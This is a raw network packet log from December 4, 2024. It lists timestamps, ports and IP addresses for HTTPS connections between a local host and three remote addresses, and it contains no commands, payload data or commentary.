Dec 4, 2024 12:17:14.222469091 CET	443	49776	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.222579002 CET	49776	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.222661972 CET	49775	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.222677946 CET	443	49775	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.222681999 CET	49776	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.222696066 CET	443	49776	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.298403025 CET	443	49771	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.298476934 CET	443	49771	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.298532009 CET	49771	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.298702955 CET	49771	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.298719883 CET	443	49771	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.298731089 CET	49771	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.298736095 CET	443	49771	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.299005985 CET	443	49772	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.299072981 CET	443	49772	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.299114943 CET	49772	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.299182892 CET	49772	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.299202919 CET	443	49772	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.299211979 CET	49772	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.299218893 CET	443	49772	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.301619053 CET	49777	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.301664114 CET	443	49777	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.301707983 CET	49778	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.301731110 CET	443	49778	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.301753044 CET	49777	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.301784039 CET	49778	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.301894903 CET	49777	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.301909924 CET	443	49777	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.301939964 CET	49778	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.301949978 CET	443	49778	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.440965891 CET	443	49773	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.441050053 CET	443	49773	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.441107035 CET	49773	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.441389084 CET	49773	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.441411972 CET	443	49773	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.441426992 CET	49773	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.441431999 CET	443	49773	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.444165945 CET	49779	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.444204092 CET	443	49779	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.444267035 CET	49779	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.444410086 CET	49779	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.444423914 CET	443	49779	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.621828079 CET	443	49774	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:14.621946096 CET	49774	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:14.622474909 CET	49774	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:14.622479916 CET	443	49774	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:14.624416113 CET	49774	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:14.624419928 CET	443	49774	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:15.512039900 CET	443	49774	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:15.512113094 CET	443	49774	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:15.512130976 CET	49774	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:15.512164116 CET	49774	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:15.512381077 CET	49774	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:15.512398958 CET	443	49774	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:15.529208899 CET	49780	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:15.529263020 CET	443	49780	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:15.529351950 CET	49780	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:15.529725075 CET	49780	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:15.529747009 CET	443	49780	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:15.938798904 CET	443	49775	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:15.939389944 CET	49775	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:15.939438105 CET	443	49775	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:15.939822912 CET	49775	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:15.939829111 CET	443	49775	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.003855944 CET	443	49776	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.006287098 CET	49776	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.006339073 CET	443	49776	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.006741047 CET	49776	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.006747007 CET	443	49776	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.022465944 CET	443	49777	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.022933006 CET	49777	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.022962093 CET	443	49777	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.023410082 CET	49777	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.023415089 CET	443	49777	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.086107016 CET	443	49778	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.086657047 CET	49778	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.086688042 CET	443	49778	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.087186098 CET	49778	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.087191105 CET	443	49778	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.166611910 CET	443	49779	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.167259932 CET	49779	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.167285919 CET	443	49779	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.167745113 CET	49779	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.167747974 CET	443	49779	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.373610020 CET	443	49775	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.373692036 CET	443	49775	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.373780966 CET	49775	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.400218010 CET	49775	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.400249004 CET	443	49775	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.400262117 CET	49775	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.400268078 CET	443	49775	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.447840929 CET	443	49776	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.447920084 CET	443	49776	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.447982073 CET	49776	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.453852892 CET	49776	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.453880072 CET	443	49776	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.453896999 CET	49776	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.453902006 CET	443	49776	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.457053900 CET	443	49777	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.457118034 CET	443	49777	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.457173109 CET	49777	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.470206022 CET	49777	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.470235109 CET	443	49777	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.470247984 CET	49777	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.470254898 CET	443	49777	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.494059086 CET	49781	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.494106054 CET	443	49781	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.494174957 CET	49781	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.499008894 CET	49782	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.499059916 CET	443	49782	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.499129057 CET	49782	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.502718925 CET	49781	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.502742052 CET	443	49781	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.503103971 CET	49782	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.503123045 CET	443	49782	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.510931969 CET	49783	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.510956049 CET	443	49783	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.511012077 CET	49783	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.511126995 CET	49783	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.511138916 CET	443	49783	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.530615091 CET	443	49778	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.530682087 CET	443	49778	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.530738115 CET	49778	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.533689976 CET	49778	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.533704042 CET	443	49778	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.533715010 CET	49778	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.533724070 CET	443	49778	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.540035963 CET	49784	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:16.540070057 CET	443	49784	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:16.540127039 CET	49784	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:16.541023970 CET	49784	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:16.541039944 CET	443	49784	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:16.600644112 CET	443	49779	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.600716114 CET	443	49779	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.600764036 CET	49779	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.620918989 CET	49779	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.620938063 CET	443	49779	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.620949030 CET	49779	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.620955944 CET	443	49779	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.624733925 CET	49785	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.624789953 CET	443	49785	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.624872923 CET	49785	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.625741959 CET	49785	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.625756979 CET	443	49785	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.627621889 CET	49786	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.627654076 CET	443	49786	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.627712011 CET	49786	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.627931118 CET	49786	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:16.627942085 CET	443	49786	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:16.927179098 CET	443	49780	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:16.927253962 CET	49780	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:16.927829027 CET	49780	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:16.927840948 CET	443	49780	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:16.930185080 CET	49780	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:16.930190086 CET	443	49780	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:16.930243015 CET	49780	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:16.930253029 CET	443	49780	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:17.941075087 CET	443	49784	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:17.944931030 CET	49784	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:17.950968981 CET	49784	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:17.950982094 CET	443	49784	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:17.953442097 CET	49784	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:17.953449011 CET	443	49784	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:17.993087053 CET	443	49780	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:17.993169069 CET	443	49780	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:17.993268967 CET	49780	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:17.994330883 CET	49780	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:17.994352102 CET	443	49780	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:18.282816887 CET	443	49782	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.283685923 CET	443	49781	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.290843010 CET	443	49783	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.295053959 CET	49782	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.295084000 CET	443	49782	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.296106100 CET	49781	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.296123028 CET	443	49781	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.296145916 CET	49782	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.296158075 CET	443	49782	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.296401024 CET	49783	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.296411037 CET	443	49783	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.296854019 CET	49783	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.296861887 CET	443	49783	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.296938896 CET	49781	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.296941996 CET	443	49781	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.406130075 CET	443	49785	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.407161951 CET	49785	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.407180071 CET	443	49785	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.407660007 CET	49785	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.407666922 CET	443	49785	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.417476892 CET	443	49786	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.418584108 CET	49786	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.418608904 CET	443	49786	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.419332027 CET	49786	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.419337034 CET	443	49786	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.726938009 CET	443	49782	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.727020025 CET	443	49782	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.727108955 CET	49782	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.727330923 CET	49782	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.727330923 CET	49782	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.727355003 CET	443	49782	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.727365017 CET	443	49782	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.727652073 CET	443	49781	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.727722883 CET	443	49781	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.727863073 CET	49781	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.729351997 CET	49781	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.729371071 CET	443	49781	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.735956907 CET	49787	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.735995054 CET	443	49787	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.736732960 CET	49787	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.736942053 CET	49788	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.736990929 CET	443	49788	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.737073898 CET	49788	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.737195969 CET	49787	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.737214088 CET	443	49787	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.737423897 CET	49788	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.737442017 CET	443	49788	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.740385056 CET	443	49783	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.740447998 CET	443	49783	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.740509033 CET	49783	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.740684986 CET	49783	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.740694046 CET	443	49783	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.740705967 CET	49783	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.740710974 CET	443	49783	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.742785931 CET	49789	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.742816925 CET	443	49789	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.742878914 CET	49789	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.742990017 CET	49789	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.743002892 CET	443	49789	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.850426912 CET	443	49785	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.850502968 CET	443	49785	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.850549936 CET	49785	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.850775957 CET	49785	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.850795984 CET	443	49785	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.854202032 CET	49790	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.854259968 CET	443	49790	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.854717016 CET	49790	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.854974031 CET	49790	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.854988098 CET	443	49790	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.864156008 CET	443	49786	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.864228010 CET	443	49786	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.864357948 CET	49786	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.864406109 CET	49786	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.864423990 CET	443	49786	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.864434958 CET	49786	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.864440918 CET	443	49786	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.866581917 CET	49793	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.866610050 CET	443	49793	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.866677999 CET	49793	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.866844893 CET	49793	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:18.866857052 CET	443	49793	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:18.912863016 CET	443	49784	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:18.912934065 CET	49784	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:18.912940025 CET	443	49784	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:18.913095951 CET	49784	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:18.913992882 CET	49784	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:18.914010048 CET	443	49784	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:20.451602936 CET	443	49787	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.456401110 CET	49787	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.456418991 CET	443	49787	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.457072020 CET	49787	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.457077980 CET	443	49787	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.500933886 CET	49797	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:20.500993967 CET	443	49797	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:20.501056910 CET	49797	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:20.501471043 CET	49797	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:20.501487017 CET	443	49797	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:20.517465115 CET	443	49788	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.517976999 CET	49788	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.518003941 CET	443	49788	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.518431902 CET	49788	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.518439054 CET	443	49788	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.526627064 CET	443	49789	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.527504921 CET	49789	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.527527094 CET	443	49789	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.528168917 CET	49789	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.528173923 CET	443	49789	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.571069956 CET	443	49790	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.576541901 CET	49790	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.576562881 CET	443	49790	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.577069044 CET	49790	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.577074051 CET	443	49790	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.655145884 CET	443	49793	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.655738115 CET	49793	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.655755043 CET	443	49793	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.656475067 CET	49793	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.656481981 CET	443	49793	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.694906950 CET	49798	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:20.694957972 CET	443	49798	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:20.695168018 CET	49798	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:20.695417881 CET	49798	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:20.695434093 CET	443	49798	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:20.737019062 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:20.737071037 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:20.737498045 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:20.737749100 CET	49799	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:20.737766027 CET	443	49799	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:20.883816004 CET	49800	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:20.883867979 CET	443	49800	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:20.884361029 CET	49800	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:20.885098934 CET	49800	443	192.168.2.4	142.250.181.68
Dec 4, 2024 12:17:20.885112047 CET	443	49800	142.250.181.68	192.168.2.4
Dec 4, 2024 12:17:20.885530949 CET	443	49787	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.885603905 CET	443	49787	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.885734081 CET	49787	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.886822939 CET	49787	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.886831999 CET	443	49787	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.886841059 CET	49787	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.886845112 CET	443	49787	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.893456936 CET	49801	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.893523932 CET	443	49801	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.893587112 CET	49801	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.905926943 CET	49801	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.905953884 CET	443	49801	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.962306976 CET	443	49788	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.962377071 CET	443	49788	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.962516069 CET	49788	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.964886904 CET	49788	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.964914083 CET	443	49788	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.964931965 CET	49788	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.964939117 CET	443	49788	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.969173908 CET	49803	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.969203949 CET	443	49803	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.969264984 CET	49803	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.969516039 CET	49803	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.969532967 CET	443	49803	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.970443964 CET	443	49789	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.970510006 CET	443	49789	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.970627069 CET	49789	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.971985102 CET	49789	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.972003937 CET	443	49789	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.972028017 CET	49789	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.972033978 CET	443	49789	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.974714994 CET	49804	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.974752903 CET	443	49804	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:20.974834919 CET	49804	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.974946022 CET	49804	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:20.974958897 CET	443	49804	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:21.005733967 CET	443	49790	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:21.005814075 CET	443	49790	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:21.005878925 CET	49790	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:21.006129980 CET	49790	443	192.168.2.4	13.107.246.63
